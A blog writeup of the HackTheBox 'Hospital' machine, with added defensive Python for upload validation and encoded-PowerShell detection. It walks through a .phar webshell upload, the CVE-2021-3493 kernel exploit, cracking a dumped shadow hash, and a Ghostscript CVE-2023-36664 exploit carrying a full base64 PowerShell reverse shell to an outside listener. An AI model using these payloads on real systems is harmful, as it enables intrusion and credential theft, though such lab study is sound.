cwoellner.com ~ personal website & blog

Writeup of Hospital From HackTheBox

Published on: Thursday, Dec 19, 2024

Getting a foothold

For the initial port scan, I use the following nmap command:

nmap -sS -A -Pn -T5 -p- -oN nmap.txt 10.129.229.189

And receive the following results:

(The nmap port table did not survive extraction. The open ports recoverable from it are 22, 53, 88, 135, 139, 389, 443, 445, 464, 593, 636, 1801, 2103, 2105, 2107, 2179, 3268, 3269, 3389, 5985, 6059, 6404, 6406, 6407, 6409, 6615, 6636, 8080 and 9389/tcp. Readable fragments of the VERSION column show Microsoft Windows Kerberos and RPC services and an LDAP service reporting "Domain: hospital.htb0., Site: Default-First-Site-Name", i.e. a Windows domain controller.)

I start by checking the service on port 443 and discover an instance of Roundcube webmail. Since there are no recent unauthenticated exploits for Roundcube, I check the other services. On port 8080 I find a simple web app that allows me to create an account and upload a file. I use the p0wny@shell:~# webshell and try different file extensions. The upload succeeds with a .phar file extension, and the uploaded file can be found in the /uploads/ directory.
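From the defender's side, the upload bypass comes down to how the extension is validated. The following is an added example (not the box's own upload code and not part of the original writeup): a denylist check of the kind that accepts a .phar next to an allowlist check that rejects it. The PHP-family extension set, the accepted types and their magic bytes are my assumptions for a document/image upload feature; the filenames used in the test are constructed.

```python
"""Upload checks: the denylist pattern that lets a .phar through, and an
allowlist-based replacement. Added example, not the box's own upload code."""
import re
import secrets

# Extensions a typical Apache/PHP (XAMPP-style) setup hands to the PHP interpreter.
# Assumed list; check the AddHandler/FilesMatch directives of the real server.
PHP_FAMILY = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".phps"}

# What a document/image upload feature should accept, with the magic bytes each
# type must start with so the body is checked as well as the name.
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".pdf": b"%PDF-",
}


def weak_check(filename: str) -> bool:
    """Denylist check of the kind that bites here: block '.php', accept the rest.
    Returns True when the upload would be accepted."""
    return not filename.lower().endswith(".php")


def hardened_check(filename: str, content: bytes) -> bool:
    """Allowlist check: no path separators, exactly one extension, that extension
    on the allowlist and not PHP-family, and content matching the extension."""
    if not filename or re.search(r"[\\/\x00]", filename):
        return False                       # '../x.png' or 'dir\x.png' rejected
    parts = filename.lower().split(".")
    if len(parts) != 2 or not parts[0]:    # 'shell.png.php', '.htaccess', 'noext'
        return False
    ext = "." + parts[1]
    if ext in PHP_FAMILY or ext not in ALLOWED:
        return False
    return content.startswith(ALLOWED[ext])


def storage_name(filename: str) -> str:
    """Never store under the client-supplied name: random name, validated extension.
    Call only after hardened_check() returned True."""
    ext = filename.lower().rsplit(".", 1)[1]
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    print("weak accepts shell.phar:", weak_check("shell.phar"))
    print("hardened accepts shell.phar:", hardened_check("shell.phar", b"<?php"))
    print("hardened accepts photo.png:", hardened_check("photo.png", png))
    print("stored as:", storage_name("photo.png"))
```

The name check alone is not enough: the uploads directory should also be served without PHP execution (or live outside the document root), so that a file which slips past validation is delivered as data rather than run.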

Pwning the container

Using the shell I find out that I am in an Ubuntu container.

www-data@webserver:…/html/uploads uname -a
Linux webserver 5.19.0-35-generic #36-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 3 18:36:56 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

I try to exploit CVE-2021-3493, which tends to work on most Ubuntu systems. I upload the exploit and run it. It works, but the webshell cannot handle the resulting shell, so I use the webshell to start a reverse shell and run the exploit from there.

After running the exploit again and getting a root shell, I take a look at /etc/shadow and dump the password hash for drwilliams.

drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:19612:0:99999:7:::

I then use hashcat to crack the password.

hashcat -m 1800 pw.hash rockyou.txt --show
$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:qwe123!@#

User flag

Using the credentials drwilliams:qwe123!@# I log into Roundcube webmail. I find a mail telling me to send a Ghostscript file, so I look for recent Ghostscript RCEs and find CVE-2023-36664.

mail

I use RevShells to generate a Base64-encoded PowerShell reverse shell and add the code as the payload for the exploit generator.

python3 CVE_2023_36664_exploit.py -g -x eps -p "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMgAiACwAMQAyADMANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="

I send the generated .eps file to Dr. Brown and wait for the reverse shell to connect back to my listener.

$ nc -lnvp 1234
Listening on 0.0.0.0 1234
Connection received on 10.129.229.189 6230
PS C:\Users\drbrown.HOSPITAL\Documents>

Now I can use the reverse shell to navigate to the Desktop folder and obtain the user flag.
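The payload handed to the exploit generator above is the base64 (UTF-16LE) form PowerShell expects for -EncodedCommand, and that encoding is exactly what makes such invocations easy to surface in process-creation logs. As an added example (not part of the original writeup), the following Python decodes encoded command lines and flags the socket primitives a reverse shell of this kind is built from. The record format, pids, image paths and the 203.0.113.5 address are constructed, as is the script fragment used as the suspicious sample.

```python
"""Decode 'powershell -e <base64>' command lines from process-creation records and
flag reverse-shell primitives. Added example; the log records are constructed."""
import base64
import re

# -e / -ec / -enc / -EncodedCommand followed by the base64 blob.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)

# Substrings checked (case-insensitively) in the decoded script.
INDICATORS = [
    "net.sockets.tcpclient",   # raw socket to a listener
    "getstream(",              # read/write loop over that socket
    "iex ",                    # executes whatever arrives on it
    "invoke-expression",
]


def encode_for_powershell(script: str) -> str:
    """How -EncodedCommand blobs are built (base64 of UTF-16LE); used here only to
    construct the sample records below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script of an encoded invocation, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def indicators_in(script: str):
    """List of INDICATORS present in the decoded script."""
    low = script.lower()
    return [i for i in INDICATORS if i in low]


def triage(records):
    """records: constructed 'pid|image|commandline' strings (the three fields a
    process-creation event always carries). Returns [(pid, hits), ...]."""
    findings = []
    for rec in records:
        pid, image, cmdline = rec.split("|", 2)
        if not image.lower().endswith("powershell.exe"):
            continue
        script = decode_encoded_command(cmdline)
        if script is None:
            continue
        hits = indicators_in(script)
        if hits:
            findings.append((int(pid), hits))
    return findings


# Constructed samples: a fragment of the socket setup the writeup's payload starts
# with, a harmless encoded command, and a record that is not PowerShell at all.
SUSPECT = '$c = New-Object System.Net.Sockets.TCPClient("203.0.113.5",1234); $s = $c.GetStream()'
BENIGN = "Get-ChildItem C:\\xampp\\htdocs"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_RECORDS = [
    f"4412|{PS}|powershell -e {encode_for_powershell(SUSPECT)}",
    f"4420|{PS}|powershell -e {encode_for_powershell(BENIGN)}",
    "4431|C:\\Windows\\System32\\cmd.exe|cmd /c whoami",
]

if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_RECORDS):
        print(pid, hits)
```

Pairing the decoded-script match with the process's outbound connection event (same pid, an unexpected destination port such as 1234) is what turns this from a string match into a confident detection.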

Administrator flag

I start by running winPEAS and see that I have write access to C:\xampp, so I check the folder and find out that this is where Roundcube is being hosted.

I put the p0wny@shell:~# from earlier in the htdocs folder (this time as a .php file) and access it via the browser.

system shell

Now I can use the shell to obtain the root flag from the Administrator's desktop.